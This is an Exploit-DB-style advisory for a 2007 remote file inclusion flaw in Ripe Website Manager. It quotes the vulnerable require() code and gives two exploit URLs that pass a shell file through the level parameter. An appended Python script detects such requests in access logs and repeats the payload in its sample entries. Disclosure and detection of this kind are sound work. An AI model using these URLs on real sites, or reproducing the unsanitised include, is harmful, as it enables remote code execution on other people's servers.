Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns



EDB-ID: 4129 | CVE: 2007-3524 | OSVDB-ID: 37799
Author: BlackNDoor | Published: 2007-06-30 | Verified: Verified

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Website Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532
#Bug::
   -> Files:
      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php
   -> vulncode:
      <?php
         ...
         define("LEVEL", $level); // directory level
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>
#Exploit::
   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]
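
Added example (not part of the original advisory and not Ripe's code): a log check that flags direct requests to the two include files listed above and separates those whose level parameter is anything other than a run of "../" segments. The combined access-log format, the names classify/scan/SAFE_LEVEL and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The two include files named in the advisory.
VULN_FILES = (
    "/admin/includes/author_panel_header.php",
    "/admin/includes/admin_header.php",
)
# Assumption: a legitimate directory level is empty or a run of "../" segments.
SAFE_LEVEL = re.compile(r"(?:\.\./)*\Z")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jun/2007:10:00:00 +0000] "GET /ripe/index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Jun/2007:10:00:05 +0000] "GET /ripe/admin/includes/admin_header.php HTTP/1.1" 200 312',
    '203.0.113.9 - - [30/Jun/2007:10:01:00 +0000] "GET /ripe/admin/includes/author_panel_header.php?level=shell.txt? HTTP/1.1" 200 87',
    '203.0.113.9 - - [30/Jun/2007:10:01:02 +0000] "GET /ripe/admin/includes/admin_header.php?level=%2e%2e%2f HTTP/1.1" 200 312',
]

def classify(log_line):
    """Return None, 'direct-access' or 'level-override' for one log line."""
    m = REQUEST.search(log_line)
    if m is None:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(VULN_FILES):
        return None
    # Only the query string is visible here; POST bodies and cookies are not logged.
    levels = parse_qs(url.query, keep_blank_values=True).get("level", [])
    if any(SAFE_LEVEL.match(v) is None for v in levels):
        return "level-override"   # request tries to steer the require() path
    return "direct-access"        # include file fetched directly: still unusual

def scan(lines):
    """Return (line_number, verdict) for every flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```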